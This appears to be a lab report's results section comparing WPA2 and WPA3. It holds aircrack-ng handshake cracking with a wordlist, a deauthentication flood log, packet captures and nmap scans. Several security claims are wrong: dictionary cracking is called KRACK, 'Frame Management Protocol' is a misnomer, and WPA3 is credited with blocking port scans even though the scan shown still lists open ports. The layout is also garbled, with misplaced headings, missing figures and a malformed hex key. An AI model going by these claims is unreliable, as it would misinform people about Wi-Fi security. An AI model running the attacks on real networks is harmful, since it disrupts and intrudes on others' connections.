

Test Case 2: Denial of Service Attack

Test Case 1: Key Reinstallation Attack

```
kali@kali:~$ aircrack-ng 1.7
[00:00:05] 20869/10303727 keys tested (3860.64 k/s)
Time left: 44 minutes, 23 seconds 0.20%
KEY FOUND! [ 12345678 ]

Master Key : 21 AE ED 25 03 DC 99 DF E6 56 95 FA F2 64 E5 41
            5C AC 28 7F 76 FD 63 FB 8B 22 C7 84 DD 73 A9 49

Transient Key : 81 14 5F D8 C6 03 D4 AC 6C BE 8B CD B4 63 57 5C
               0C E1 0C 9C 52 F1 57 C5 7B 6F 06 96 C4 84 AB E2
               AS 05 2B FF 01 18 B2 A1 25 86 00 14 00 52 95 09
               83 28 55 EE 70 A3 27 A9 CD DC 60 80 6C 11 C1 11

EAPOL HMAC : 1D 22 CE 96 52 27 76 44 CA 9E 91 91 BC 0C 80 AD
```

Fig.1 Test Case 1 on WPA2

```
kali@kali:~$ sudo aircrack-ng -b A0:04:60:7A:E7:FE netgearwpa3-01.cap -w rockyou.txt
Reading packets, please wait ...
Opening netgearwpa3-01.cap
Read 2734 packets.
1 potential targets

Unsupported key version 0 encountered.
May be WPA3 - not yet supported.
zsh: IOT instruction sudo aircrack-ng -b A0:04:60:7A:E7:FE netgearwpa3-01.cap -w rockyou.txt
```

Fig.2 Test Case 1 on WPA3

Figure 1 and Figure 2 show the interface of Aircrack-ng during an attempt to crack the captured handshake file.

- In Figure 1, Aircrack-ng successfully retrieves the WPA2 router password. This indicates that WPA2 is vulnerable to the Key Reinstallation Attack (KRACK), as it allows the attacker to reinstall a key by exploiting a weakness in the 4-way handshake process.
- Figure 2, however, shows that Aircrack-ng is unable to crack the WPA3 handshake. This is due to WPA3's use of the Simultaneous Authentication of Equals (SAE) algorithm, which mitigates the risk of KRACK by ensuring that each session handshake uses a unique and robust encryption key. As a result, WPA3 demonstrates strong resistance to the same attack.

This test case highlights the significant security improvement that WPA3 provides over WPA2, particularly in defending against Key Reinstallation Attacks..

```
kali@kali:~$ aircrack-ng 1.7
21:38:22 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:22 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:23 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:23 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:24 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:24 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:25 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:25 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:26 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:26 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:27 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:27 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:28 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:28 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:29 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:29 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:29 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:30 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:30 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
21:38:31 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
write failed: Network is down
wi_write(): Network is down
```

Fig.3 Test Case 2 on WPA2

```
kali@kali:~$ aircrack-ng 1.7
22:00:00 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:01 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:01 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:02 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:02 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:03 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:03 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:04 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:04 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:05 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:05 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:06 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:06 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:07 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:07 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:08 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:08 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:09 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:09 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:10 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:10 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:11 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
22:00:11 Sending DeAuth (code 7) to broadcast -- BSSID: [A0:04:60:7A:E7:FE]
```

Fig.4 Test Case 2 on WPA3

Figure 3 and Figure 4 demonstrate the results of a Denial of Service (DoS) attack using Aireplay-ng on router X.

- Figure 3 shows that the DoS attack successfully disrupts the network on the WPA2-protected router. This indicates that WPA2 lacks sufficient protection against DoS attacks, making it vulnerable to such disruptions.
- In contrast, Figure 4 illustrates that the same DoS attack is ineffective against the WPA3-protected router. This is due to WPA3's implementation of the Frame Management Protocol (FMP), which provides enhanced protection against DoS attacks by validating management frames and preventing malicious interference.

This test case underscores the improved resilience of WPA3 networks against Denial of Service attacks, whereas WPA2 remains susceptible to such vulnerabilities.

Test Case 3: Denial of Service Attack on Client Y

Fig.5 Test Case 3 on WPA2

Fig.6 Test Case 3 on WPA3

Figure 5 and **Figure 6** highlight the results of a Denial of Service (DoS) attack targeting client Y while connected to router X.

- **Figure 5** demonstrates that client Y, when connected to a WPA2-protected network, is vulnerable to the DoS attack. The network connection is disrupted, showing WPA2's inability to adequately protect clients from such attacks.
- **Figure 6** shows that when client Y is connected to a WPA3-protected network, the DoS attack is unsuccessful. This is due to WPA3's Frame Management Protocol (FMP), which enhances security by preventing the disruption of client connections during a DoS attack.

This test case further emphasizes the superiority of WPA3 in safeguarding network clients from Denial of Service attacks, compared to WPA2.

Test Case 4: Denial of Service Attack on Client Z

Fig.7 Test Case 4 on WPA2

Fig.8 Test Case 4 on WPA3

Figure 7 and **Figure 8** depict the results of a Denial of Service (DoS) attack directed at client Z while connected to router X.

- **Figure 7** illustrates that client Z, when connected to a WPA2-secured network, is vulnerable to the DoS attack, with the connection being disrupted. This highlights the security limitations of WPA2 against such attacks.
- **Figure 8** demonstrates that when client Z is connected to a WPA3-secured network, the DoS attack is unsuccessful. WPA3's Frame Management Protocol (FMP) prevents interference with the client's network connection, ensuring robust protection against DoS attacks.

This test case reinforces the enhanced security provided by WPA3 compared to WPA2, particularly in protecting clients from Denial of Service attacks.

Test Case 5: Network Sniffing Attack on Router X

```

Questions: 1
Answer RRs: 2
Authority RRs: 0
Additional RRs: 0
Queries
  gateway.instagram.com: type A, class IN
  Name: gateway.instagram.com
  [Name Length: 21]
  [Label Count: 3]
  Type: A (1) (Host Address)
  Class: IN (0x0001)
Answers
  0000 aa aa 03
  0010 40 11 9e
  0020 00 5f 13
  0030 07 e7 01
  0040 61 6d 03
  0050 01 00 00
  0060 08 66 61
  0070 01 00 00
  Frame (225 bytes)
  
```

Fig.9 Test Case 5 on WPA2

```

File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help
Apply a display filter: <CTRL>-F
No. Time Source Destination Protocol Length Info
9646 116.521385159 192.168.100.5 104.18.11.207 TCP 74 51048 - 443 [SYN] Seq=
9647 116.523629462 104.18.11.207 192.168.100.5 TCP 74 443 - 51048 [SYN, ACK] Seq=
9648 116.523655965 192.168.100.5 104.18.11.207 TCP 66 51048 - 443 [ACK] Seq=
9649 116.523617995 192.168.100.5 104.18.11.207 TCP 78 [TCP Dup ACK 9652#1] 5
9650 116.528780146 104.18.11.207 192.168.100.5 TLSv1.3 583 Client Hello (SNI=maximum)
9651 116.530671359 104.18.11.207 192.168.100.5 TLSv1.3 1506 Server Hello, Change C
9652 116.530697844 192.168.100.5 104.18.11.207 TCP 66 51048 - 443 [ACK] Seq=
9653 116.531160472 104.18.11.207 192.168.100.5 TCP 393 [TCP Previous segment-
9654 116.531190591 192.168.100.5 104.18.11.207 TCP 78 [TCP Dup ACK 9652#1] 5
9655 116.532409049 104.18.11.207 192.168.100.5 TCP 1506 [TCP Out-of-Order] 443
9656 116.532430069 192.168.100.5 104.18.11.207 TCP 66 51048 - 443 [ACK] Seq=
9657 116.532634034 74.125.200.95 192.168.100.5 TCP 74 443 - 45584 [SYN, ACK] Seq=
9658 116.532655220 192.168.100.5 74.125.200.95 TCP 66 45584 - 443 [ACK] Seq=
9659 116.532750900 74.125.200.95 192.168.100.5 TCP 74 443 - 45598 [SYN, ACK] Seq=
9660 116.532761637 192.168.100.5 74.125.200.95 TCP 66 45598 - 443 [ACK] Seq=
9661 116.537843154 192.168.100.5 74.125.200.95 TLSv1.3 583 Client Hello (SNI=font
9662 116.539579075 192.168.100.5 74.125.200.95 TLSv1.3 583 Client Hello (SNI=font
9663 116.539632089 185.199.108.153 192.168.100.5 TCP 1506 443 - 46914 [ACK] Seq=
9664 116.539647299 192.168.100.5 185.199.108.153 TCP 66 46914 - 443 [ACK] Seq=
9665 116.539884332 185.199.108.153 192.168.100.5 TCP 1506 443 - 46914 [PSH, ACK] Seq=
9666 116.539896780 192.168.100.5 185.199.108.153 TCP 66 46914 - 443 [ACK] Seq=
9667 116.540808358 185.199.108.153 192.168.100.5 TLSv1.3 1228 Application Data
9668 116.540909413 192.168.100.5 185.199.108.153 TCP 66 46914 - 443 [ACK] Seq=
9669 116.549572791 185.199.108.153 192.168.100.5 TCP 2940 443 - 46914 [PSH, ACK] Seq=
9670 116.549573121 185.199.108.153 192.168.100.5 TLSv1.3 917 Application Data
9671 116.549607872 192.168.100.5 185.199.108.153 TCP 66 46914 - 443 [ACK] Seq=
9672 116.549633475 192.168.100.5 185.199.108.153 TCP 66 46914 - 443 [ACK] Seq=
9673 116.552940424 74.125.200.95 192.168.100.5 TCP 66 443 - 45598 [ACK] Seq=
9674 116.554229907 192.168.100.5 185.199.108.153 TLSv1.3 178 Application Data
9675 116.555069433 192.168.100.5 104.18.11.207 TLSv1.3 130 Change Cipher Spec, App
9676 116.555222044 74.125.200.95 192.168.100.5 TLSv1.3 1466 Server Hello, Change C
  Frame 9651: 1506 bytes on wire (12048 bits), 1506 bytes captured (0.000000000) on interface eth0
  Ethernet II, Src: Netgear_7a:e7:fe (a0:04:60:7a:e7:fe), Dst: 08:00:00:00:00:00 (00:00:00:00:00:00)
  Internet Protocol Version 4, Src: 104.18.11.207, Dst: 185.199.108.153 (0030)
  Transmission Control Protocol, Src Port: 443, Dst Port: 443 (0030)
  Transport Layer Security, Src Port: 443, Dst Port: 443 (0030)
  
```

Fig.10 Test Case 5 on WPA3

Figure 9 and Figure 10 illustrate the outcomes of a Network Sniffing attack on router X.

- **Figure 9** shows that when router X is secured with WPA2, the network is vulnerable to sniffing attacks. The attacker can capture and decrypt data transmitted over the network, exposing sensitive information.
- **Figure 10** demonstrates that when router X is secured with WPA3, the Network Sniffing attack fails. This is due to WPA3's forward secrecy, which uses a stronger encryption algorithm to ensure that even if data is intercepted, it cannot be decrypted by the attacker.

This test highlights the significant improvement in encryption and privacy provided by WPA3 over WPA2, especially in preventing network sniffing attacks.

Test Case 6: Network Port Scanning on Router X

```

kali@kali: ~
File Actions Edit View Help
(kali@kali)-[~]
└─$ sudo nmap 192.168.100.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-20 17:06 UTC
Nmap scan report for OpenWrt.lan (192.168.100.1)
Host is up (0.0077s latency).
Not shown: 997 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
MAC Address: A0:04:60:7A:E7:FE (Netgear)

Nmap scan report for 192.168.100.3
Host is up (0.059s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT      STATE SERVICE
7070/tcp  open  realserver
MAC Address: 74:12:B3:5E:A5:C1 (Chongqing Fugui Electronics)

Nmap scan report for Rizaldis-MBP.lan (192.168.100.6)
Host is up (0.0089s latency).
Not shown: 998 closed tcp ports (reset)
PORT      STATE SERVICE
5000/tcp  open  upnp
7000/tcp  open  afs3-filerserver
MAC Address: 3C:06:30:2C:D6:21 (Apple)
  
```

Fig.11 Test Case 6 on WPA2

```

kali@kali: ~
File Actions Edit View Help
(kali@kali)-[~]
└─$ sudo nmap 192.168.100.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-30 20:09 WIB
Nmap scan report for OpenWrt.lan (192.168.100.1)
Host is up (0.0012s latency).
Not shown: 997 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
MAC Address: A0:04:60:7A:E7:FE (Netgear)

Nmap scan report for kali.lan (192.168.100.5)
Host is up (0.000013s latency).
All 1000 scanned ports on kali.lan (192.168.100.5) are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (2 hosts up) scanned in 40.31 seconds
  
```

Fig.12 Test Case 6 on WPA3

Figure 11 and Figure 12 present the outcomes of a Network Port Scanning attack on router X.

- **Figure 11** shows that router X using WPA2 is vulnerable to a Network Port Scanning attack. The scan successfully identifies open ports, which could be exploited by an attacker to gain access to the network or launch further attacks.
- **Figure 12** demonstrates that when router X is secured with WPA3, the Network Port Scanning attack fails. This is due to WPA3's enhanced client isolation feature, which restricts access between devices on the same network, preventing the attacker from detecting open ports.

This test emphasizes WPA3's superior protection against port scanning attacks compared to WPA2, providing an additional layer of security through improved network isolation.